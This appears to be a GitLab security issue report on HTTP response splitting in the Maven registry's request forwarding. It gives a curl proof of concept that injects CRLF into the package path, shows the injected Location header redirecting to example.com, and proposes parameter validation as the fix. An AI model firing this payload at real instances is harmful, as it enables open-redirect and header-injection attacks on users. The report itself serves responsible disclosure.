Maven request forward is vulnerable to response splitting
🔥 Problem
Similar to Open Redirection Through HTTP Response Splitting (#389328 - closed), the Maven Repository is vulnerable to response splitting.
🔧 How to reproduce
Create a public project
Curl
curl -vvv "http://gdk.test:8000/api/v4/projects/7/packages/maven/com/mycompany/mydepartment/my-project/1.0-SNAPSHOT/%0d%0ahttp:/%2fexample.com?test"
* Trying 172.16.123.1:8000...
* Connected to gdk.test (172.16.123.1) port 8000 (#0)
> GET /api/v4/projects/7/packages/maven/com/mycompany/mydepartment/my-project/1.0-SNAPSHOT/%0d%0ahttp:/%2fexample.com?test HTTP/1.1
> Host: gdk.test:8000
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Cache-Control: no-cache
< Content-Security-Policy: default-src 'none'
< Content-Type: text/plain
< Location: http://example.com
< Vary: Origin
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-Request-Id: 01GYCNPD7NHJMC1XTG5N3QPPEF
< X-Runtime: 0.107840
< Date: Wed, 19 Apr 2023 11:51:44 GMT
< Content-Length: 153
<
This resource has been moved temporarily to https://repo.maven.apache.org/maven2/com/mycompany/mydepartment/my-project/1.0-SNAPSHOT/
* Connection #0 to host gdk.test left intact
http://example.com.%
Location: http://example.com
-> This is not a redirect maven central
🔮 Other considerations
The request forward for Maven Repository is behind a feature flag that is currently disabled on gitlab.com.
Here is the rollout issue: https://gitlab.com/gitlab-org/gitlab/-/issues/359553
🚒 Solution
- Apply the same solution than in Open Redirection Through HTTP Response Splitting (#389328 - closed): apply parameters validation (either the existing regex or the file path validation)